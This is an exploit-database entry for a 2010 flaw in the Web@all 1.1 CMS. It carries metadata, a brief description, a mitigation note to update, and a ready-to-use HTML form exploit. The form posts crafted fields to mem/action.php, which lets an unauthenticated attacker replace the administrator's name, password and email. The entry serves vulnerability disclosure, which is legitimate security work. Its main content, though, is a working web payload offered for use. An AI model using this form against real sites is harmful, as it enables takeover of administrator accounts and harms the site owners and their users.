Web@all - exploit.company

vendor:

Web@all

by:

giudinvx

7,5

CVSS

HIGH

Remote Admin Settings Change

264

CWE

Product Name: Web@all

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:webatall:web@all

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Web@all <= 1.1 Remote Admin Settings Change

A vulnerability exists in Web@all 1.1 which allows an attacker to change the admin user, password and email. An attacker can exploit this vulnerability by sending a malicious POST request to the action.php file with the new admin credentials.

Mitigation:

Update to the latest version of Web@all.

Source

Exploit-DB raw data:

===========================================
Web@all <= 1.1 Remote Admin Settings Change
===========================================

Author___: giudinvx
Email____: <giudinvx[at]gmail[dot]com>
Date_____: 27/12/2010
Site_____: http://www.giudinvx.altervista.org/
--------------------------------------------------------
Application Info:
web@all 1.1
web@all is a CMS which is not similar to general CMS,
you can build it easyly by yourself.
www.webatall.com
--------------------------------------------------------

==============[[ -Exploit Code- ]]==============

<html>
<form method="post" enctype="multipart/form-data"
action="[localhost]mem/action.php" name="f1">
Change Admin user, password and email.<br/>
Password<input type="text" value="" name="password"><br/>
Password<input type="text" value="" name="answer"><br/>
Email<input type="text" value="" name="email">
<input type="hidden" value="Admin" name="nickname">
<input type="hidden" value="" name="question">
<input type="hidden" value="" name="sign">
<input type="hidden" value="" name="person[firstname]">
<input type="hidden" value="" name="person[lastname]">
<input type="hidden" value="" name="person[country]">
<input type="hidden" value="" name="person[province]">
<input type="hidden" value="" name="person[city]">
<input type="hidden" value="" name="person[address]">
<input type="hidden" value="" name="person[zip]">
<input type="hidden" value="" name="person[mobile]">
<input type="hidden" value="" name="person[phone]">
<input type="hidden" value="" name="person[other]">
<input type="hidden" value="member" name="_lib">
<input type="hidden" value="member" name="_file">
<input type="hidden" value="person" name="memtype">
<input type="hidden" value="do_edit" name="_act">
<input type="submit" value="Submit">
</form>
</html>